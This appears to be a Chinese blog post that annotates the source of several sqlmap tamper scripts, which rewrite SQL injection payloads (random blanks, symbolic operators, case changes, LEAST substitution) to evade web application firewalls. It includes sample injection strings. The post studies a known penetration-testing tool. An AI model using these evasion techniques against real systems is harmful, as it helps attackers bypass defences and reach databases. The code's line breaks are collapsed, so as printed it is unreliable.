sqlmap中的tamper 脚本分析
space2randomblank
作用:空格替换为备选字符集中的随机字符
例子:
('select id from users')
( select %0Did%0DFRM%0A users')
详细注释:
#!/usr/bin/env python//此处用法为:程序到env设置里查找python的安装路径,再调用对应路径下的解释器程序完成操作""" //python 的多行注释符
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""import randomfrom lib.core.compat import xrange //导入sqlmap中的lib/core/compat中的xrange函数
from lib.core.enums import PRIORITY//导入sqlmap中lib/core/enums 中的PRIORITY函数__priority__ = PRIORITY.LOW//定义优先级,此处级别为一般def dependencies(): //定义dependencies() ,此处是为了和整体脚本的结构保持一致pass //不做任何事情,一般用做站位语句,为了保证程序的完整性def tamper(payload, **kwargs)://定义tamper 脚本,payload, **kwargs为定义的参数""" //多行注释符Replaces space character (' ') with a random blank character from a valid set of alternate characters //此处为tamper说明,以便使用该脚本Tested against: //用于多种数据库,并且作用与弱防护效果的防火墙* Microsoft SQL Server 2005* MySQL 4, 5.0 and 5.5* Oracle 10g* PostgreSQL 8.3, 8.4, 9.0Notes:* Useful to bypass several web application firewalls>>> random.seed(0)>>> tamper('SELECT id FROM users')'SELECT%0Did%0CFROM%0Ausers'"""# ASCII table:# TAB 09 horizontal TAB# LF 0A new line# FF 0C new page# CR 0D carriage returnblanks = ("%09", "%0A", "%0C", "%0D")retVal = payloadif payload: //判断payloadretVal = "" //将retVal 赋值为空语句quote, doublequote, firstspace = False, False, Falsefor i in xrange(len(payload))://xrange为一个生成器if not firstspace:if payload[i].isspace()://检测字符串是否只由空格组成firstspace = True//将true 赋给firstspaceretVal += random.choice(blanks)//返回一个列表,元组或字符串的随机项continue//跳出本次循环elif payload[i] == '\''://判断字符是否为'\'quote = not quoteelif payload[i] == '"'://判断字符是否为"doublequote = not doublequoteelif payload[i] == ' ' and not doublequote and not quote:retVal += random.choice(blanks)//返回一个列表,元组或字符串的随机项continue//跳出本次循环retVal += payload[i]return retVal//返回随机字符
symboliclogical
作用:AND和OR替换为&&和||
#!/usr/bin/env python"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""import refrom lib.core.enums import PRIORITY__priority__ = PRIORITY.LOWESTdef dependencies():passdef tamper(payload, **kwargs):"""Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)>>> tamper("1 AND '1'='1")"1 %26%26 '1'='1""""retVal = payload//将payload赋值给retValif payload:retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload))//判断是否为AND和OR,将其替换为&&和||return retVal
uppercase
作用:全部替换为大写值
#!/usr/bin/env python"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""import refrom lib.core.data import kb
from lib.core.enums import PRIORITY__priority__ = PRIORITY.NORMALdef dependencies():passdef tamper(payload, **kwargs):"""Replaces each keyword character with upper case value (e.g. select -> SELECT)Tested against:* Microsoft SQL Server 2005* MySQL 4, 5.0 and 5.5* Oracle 10g* PostgreSQL 8.3, 8.4, 9.0Notes:* Useful to bypass very weak and bespoke web application firewallsthat has poorly written permissive regular expressions* This tamper script should work against all (?) databases>>> tamper('insert')'INSERT'"""retVal = payloadif payload:for match in re.finditer(r"[A-Za-z_]+", retVal)://对retVal payload 进行大写查找word = match.group()//将查找内容赋值给wordif word.upper() in kb.keywords://如果在攻击载荷中有小写字母retVal = retVal.replace(word, word.upper())//将小写字母转化成大写字母return retVal//返回大写字母
informationschemacomment
作用:标识符后添加注释
#!/usr/bin/env python"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""import refrom lib.core.enums import PRIORITY__priority__ = PRIORITY.NORMALdef tamper(payload, **kwargs):"""Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier>>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'"""retVal = payloadif payload://判断payloadretVal = re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload)//赋值遇见information_schema return retVal//返回
least
作用:替换大于号为least
#!/usr/bin/env python"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""import refrom lib.core.enums import PRIORITY__priority__ = PRIORITY.HIGHESTdef dependencies():passdef tamper(payload, **kwargs):"""Replaces greater than operator ('>') with 'LEAST' counterpartTested against:* MySQL 4, 5.0 and 5.5* Oracle 10g* PostgreSQL 8.3, 8.4, 9.0Notes:* Useful to bypass weak and bespoke web application firewalls thatfilter the greater than character* The LEAST clause is a widespread SQL command. Hence, thistamper script should work against majority of databases>>> tamper('1 AND A > B')'1 AND LEAST(A,B+1)=B+1'"""retVal = payloadif payload:match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)//re.search扫描整个字符串并返回第一个成功的匹配 \w 等价于'[A-Za-z0-9_]'if match:_ = "%sLEAST(%s,%s+1)=%s+1" % (match.group(1), match.group(3), match.group(4), match.group(4))//返回match 的一个或多个子组retVal = retVal.replace(match.group(0), _)//将旧字符串替换成新的字符串return retVal//返回retVal```php
lowercase
作用:将大写字母转化成小写字母
#!/usr/bin/env python"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""import refrom lib.core.data import kb
from lib.core.enums import PRIORITY__priority__ = PRIORITY.NORMALdef dependencies():passdef tamper(payload, **kwargs):"""Replaces each keyword character with lower case value (e.g. SELECT -> select)Tested against:* Microsoft SQL Server 2005* MySQL 4, 5.0 and 5.5* Oracle 10g* PostgreSQL 8.3, 8.4, 9.0Notes:* Useful to bypass very weak and bespoke web application firewallsthat has poorly written permissive regular expressions>>> tamper('INSERT')'insert'"""retVal = payload //将payload赋值给retVal,以便中间转换if payload://进行判断payloadfor match in re.finditer(r"\b[A-Za-z_]+\b", retVal)://对retVal payload 进行小写查找word = match.group()//将查找到的字母赋值给wordif word.upper() in kb.keywords://如果再攻击载荷中有大写字母retVal = retVal.replace(word, word.lower())//将大写字母转化为小写字母return retVal//返回小写字母
sqlmap中的tamper 脚本分析相关推荐
- mysql常用的tamper脚本_总结一些sqlmap的常用tamper脚本释义
要想成为一名合格的"脚本小子",我们首先需要一个强大的工具,然后利用好他的脚本.但是脚本也不能乱用,首先就是要了解一下SqlMap的常用的脚本,然后分清楚场合进行利用.(好的,看开 ...
- sqlmap之tamper脚本
sqlmap之tamper脚本 进行注入时,往往会遇到服务端主机装有 WAF(Web Application Firewall)对 Payload 进行过滤的情况,这使得注入攻击无法成功实施.但 WA ...
- SQLMap中tamper的简介
目录结构 一.SQLMap中tamper的简介 1.tamper的作用 2.tamper用法 二.适配不同数据库类型的测试tamper 三.SQLMap中tamper篡改脚本的功能解释 一.SQLMa ...
- sqlmap tamper脚本编写
0x00 sqlmap tamper简介 sqlmap是一个自动化的SQL注入工具,而tamper则是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf. 0x01 ...
- sqlmap之tamper脚本编写
目录 前言 tamper脚本实战 前言 sqlmap是一个自动化的SQL注入工具,而tamper则是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf. 为了说明ta ...
- linux查询日志中页面返回状态码,[linux shell] Shell脚本实现apache日志中的状态码分析...
这篇文章主要介绍了Shell脚本实现apache日志中的状态码分析,本文先是介绍了按天切割日志的方法,然后给出了分析访问状态码的脚本,需要的朋友可以参考下 一.首先将apache日志按天切割 复制代码 ...
- sqlmap tamper mysql_sqlmap之常用tamper脚本
常用tamper脚本 apostrophemask.py 适用数据库:ALL 作用:将引号替换为utf-8,用于过滤单引号 使用脚本前:tamper("1 AND '1'='1") ...
- SQLMAP进阶使用 --tamper
实验原理 tamper脚本是SQLMAP中用于绕过waf或应对网站过滤逻辑的脚本.SQLMA自带了一些tamper脚本,可以在 tamper目录下查看它们.用户也可以根据已有的tamper脚本来编写自 ...
- Bypass 360主机卫士SQL注入防御(附tamper脚本)
0x01 前言 在测试过程中,经常会遇到一些主机防护软件,对这方面做了一些尝试,可成功bypass了GET和POST的注入防御,分享一下姿势. 0x02 环境搭建 Windows Server 200 ...
最新文章
- 用二维编码做特色名片!
- Stanford UFLDL教程 池化Pooling
- 笔记-信息系统开发基础-面向对象基本概念-多态
- Android面试题详细整理系列(三)
- 计算机的限制而被取消win7,win7系统本次操作由于这台计算机限制而被取消的解决方法...
- 计算机考研评分标准,考研的评分标准.doc
- STM32F429HAL库定时器学习笔记
- 计算机一直在启动修复怎么关机,电脑开机总是要启动修复修复后重启还要修复怎么处理方法...
- 专业的压缩解压缩工具 WinZip Pro 7 for Mac
- 全国计算机等级考试怎么保存,全国计算机等级考试一级备考:Word文档保存为PDF文件...
- 自学软件测试需要学到哪些内容?
- 东方时尚驾校的学车经历
- 易语言新手入门教程第十五课 - QQ自动登录器第三部分
- Vue结合vant框架实现通讯录a-z排序
- 聊聊“PPT文化”违反敏捷么
- wincc c 语言改颜色,wincc常用c脚本小草设置
- java接口与抽象类的异同
- 写公众号的一些【奇葩经历】以及【思考】
- 中文改写神器下载-中文改写神器
- 新的掌舵手已就位,汽车之家这艘船将驶向何方?